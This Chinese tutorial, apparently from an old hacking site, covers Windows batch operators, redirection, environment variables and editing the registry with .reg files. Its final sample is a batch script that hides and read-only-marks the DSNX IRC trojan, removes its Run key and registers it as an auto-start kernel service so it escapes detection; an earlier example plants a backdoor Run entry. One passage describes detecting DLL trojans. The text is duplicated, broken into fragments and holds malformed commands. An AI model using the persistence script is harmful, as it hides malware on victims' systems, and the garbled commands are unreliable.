1.&
Usage:第一条命令 & 第二条命令 [& 第三条命令...]
用这种方法可以同时执行多条命令,而不管命令是否执行成功
2.&&
Usage:第一条命令 && 第二条命令 [&& 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则
一直执行完所有命令;
3.||
Usage:第一条命令 || 第二条命令 [|| 第三条命令...]
用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的
命令则一直执行完所有命令;
1.| 命令
Usage:第一条命令 | 第二条命令 [| 第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。
2.>,>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内
容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。
3.< , >& , <&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
使用命令重定向操作符可以使用重定向操作符将命令输入和输出数据流从默认位置重定向到其他位置。输入或输出数据流的位置称为句柄。
下表将列出可用的句柄。
句柄 句柄的数字代号描述
STDIN 0 键盘输入
STDOUT 1 输出到命令提示符窗口
STDERR 2 错误输出到命令提示符窗口
UNDEFINED 3-9 句柄由应用程序单独定义,它们是各个工具特有的
|
%ALLUSERSPROFILE% | 局部 | 返回“所有用户配置文件”的位置。 |
%APPDATA% | 局部 | 返回默认情况下应用程序存储数据的位置。 |
%CD% | 局部 | 返回当前目录字符串。 |
%CMDCMDLINE% | 局部 | 返回用来启动当前的 Cmd.exe 的准确命令行。 |
%CMDEXTVERSION% | 系统 | 返回当前的“命令处理程序扩展”的版本号。 |
%COMPUTERNAME% | 系统 | 返回计算机的名称。 |
%COMSPEC% | 系统 | 返回命令行解释器可执行程序的准确路径。 |
%DATE% | 系统 | 返回当前日期。使用与date /t命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息,请参阅 Date。 |
%ERRORLEVEL% | 系统 | 返回上一条命令的错误代码。通常用非零值表示错误。 |
%HOMEDRIVE% | 系统 | 返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 |
%HOMEPATH% | 系统 | 返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 |
%HOMESHARE% | 系统 | 返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 |
%LOGONSERVER% | 局部 | 返回验证当前登录会话的域控制器的名称。 |
%NUMBER_OF_PROCESSORS% | 系统 | 指定安装在计算机上的处理器的数目。 |
%OS% | 系统 | 返回操作系统名称。Windows 2000 会将该操作系统显示为 Windows NT。 |
%PATH% | 系统 | 指定可执行文件的搜索路径。 |
%PATHEXT% | 系统 | 返回操作系统认为可执行的文件扩展名的列表。 |
%PROCESSOR_ARCHITECTURE% | 系统 | 返回处理器的芯片体系结构。值:x86 或 IA64(基于 Itanium)。 |
%PROCESSOR_IDENTFIER% | 系统 | 返回处理器说明。 |
%PROCESSOR_LEVEL% | 系统 | 返回计算机上安装的处理器的型号。 |
%PROCESSOR_REVISION% | 系统 | 返回处理器的版本号。 |
%PROMPT% | 局部 | 返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。 |
%RANDOM% | 系统 | 返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。 |
%SYSTEMDRIVE% | 系统 | 返回包含 Windows 服务器操作系统根目录(即系统根目录)的驱动器。 |
%SYSTEMROOT% | 系统 | 返回 Windows 服务器操作系统目录的位置。 |
%TEMP% 和 %TMP% | 系统和用户 | 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP,而其他应用程序则需要 TMP。 |
%TIME% | 系统 | 返回当前时间。使用与 time /t 命令相同的格式。由 Cmd.exe 生成。有关 time 命令的详细信息,请参阅 Time。 |
%USERDOMAIN% | 局部 | 返回包含用户帐户的域的名称。 |
%USERNAME% | 局部 | 返回当前登录的用户的名称。 |
%USERPROFILE% | 局部 | 返回当前用户的配置文件的位置。 |
%WINDIR% | 系统 | 返回操作系统目录的位置。 |
1. | 命令
Usage:第一
条命令 | 第二条命令 [| 第三条命令...]
将第一条命令的结
果作为第二条命令的参
数来使用,记得在un
ix中这种方式很常见
。
sample:
time /t>>D://IP.log netstat -n -p tcp|find ":3389">>D://IP.log start Explorer |
看出来了么?用于
终端服务允许我们为用
户自定义起始的程序,
来实现让用户运行下面
这个bat,以获得登
录用户的IP。
2. >、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。
sample1:
echo hello world>c://hello.txt (stupid example?) |
sample2:
时下DLL木马盛
行,我们知道syst
em32是个捉迷藏的
好地方,许多木马都削
尖了脑袋往那里钻,D
LL马也不例外,针对
这一点我们可以在安装
好系统和必要的应用程
序后,对该目录下的E
XE和DLL文件作一
个记录:运行CMD-
-转换目录到syst
em32--dir *.exe>exeb
ack.txt & dir *.dll>dllb
ack.txt,这样
所有的EXE和DLL
文件的名称都被分别记
录到exeback.
txt和dllbac
k.txt中,日后如
发现异常但用传统的方
法查不出问题时,则要
考虑是不是系统中已经
潜入DLL木马了.这
时我们用同样的命令将
system32下的
EXE和DLL文件记
录到另外的exeba
ck1.txt和dl
lback1.txt
中,然后运行:
CMD--fc exeback.tx
t exeback1.t
xt>diff.tx
t & fc dllback.tx
t dllback1.t
xt>diff.tx
t.(用FC命令比较
前后两次的DLL和E
XE文件,并将结果输
入到diff.txt
中),这样我们就能发
现一些多出来的DLL
和EXE文件,然后通
过查看创建时间、版本
、是否经过压缩等就能
够比较容易地判断出是
不是已经被DLL木马
光顾了。没有是最好,
如果有的话也不要直接
DEL掉,先用reg
svr32 /u trojan.dll
将后门DLL文件注销
掉,再把它移到回收站
里,若系统没有异常反
映再将之彻底删除或者
提交给杀毒软件公司。
3. < 、>& 、<&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用,也就不多做介绍。
五.如何用批处理文件来操作注册表
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)关于注册表的操作,常见的是创建、修改、删除。
1.创建:
一种是创建子项(Subkey)。我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//hacker] |
然后执行该脚本,
你就已经在HKEY_
LOCAL_MACH
INE//SOFTW
ARE//Micro
soft下创建了一个
名字为“hacker
”的子项。
另一种是创建一个项目名称。那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run] 3q6] G t k,Q0"Invader"="Ex4rch" "Door"=C:////WINNT////system32////door.exe "Autodos"=dword:02 |
这样就在[HKEY_LOCAL_MACHINE/ SOFTWARE/ Microsoft/ Windows/ CurrentVersion/ Run]下新建了:Invader、door、about这三个项目
Invader的类型是“String value”,door的类型是“REG SZ value”,Autodos的类型是“DWORD value”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run] "Ex4rch"=- |
执行该脚本,[HKEY_LOCAL_MACHINE/ SOFTWARE/ Microsoft/ /Windows/ CurrentVersion/ Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run] |
执行该脚本,[H
KEY_LOCAL_
MACHINE/ SOFTWARE/ Microsoft/
Windows/ CurrentVer
sion/ Run]就已经被删除
了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run] "Invader"="Ex4rch" "door"=hex:255 "Autodos"=dword:000000128 只需要这样: @echo Windows Registry Editor Version 5.00>>Sample.reg @echo [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]>Sample.reg @echo "Invader"="Ex4rch">>Sample.reg @echo "door"=5>>C:////WINNT////system32////door.exe>>Sample.reg @echo "Autodos"=dword:02>>Sample.reg |
samlpe2:
我们现在在使用一
些比较老的木马时,可
能会在注册表的[HK
EY_LOCAL_M
ACHINE/ SOFTWARE/ Microsoft/
Windows/ CurrentVer
sion/ Run(Runonc
e、Runservi
ces、Runexe
c)]下生成一个键值
用来实现木马的自启动
.但是这样很容易暴露
木马程序的路径,从而
导致木马被查杀,相对
地若是将木马程序注册
为系统服务则相对安全
一些.下面以配置好地
IRC木马DSNX为
例(名为windrv
32.exe)
@start windrv32.exe @attrib +h +r windrv32.exe @echo [HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run] >>patch.dll @echo "windsnx "=- >>patch.dll @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c://winnt//system32//windrv32.exe @regedit /s patch.dll @delete patch.dll @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动] @REM 这样不是更安全^_^. |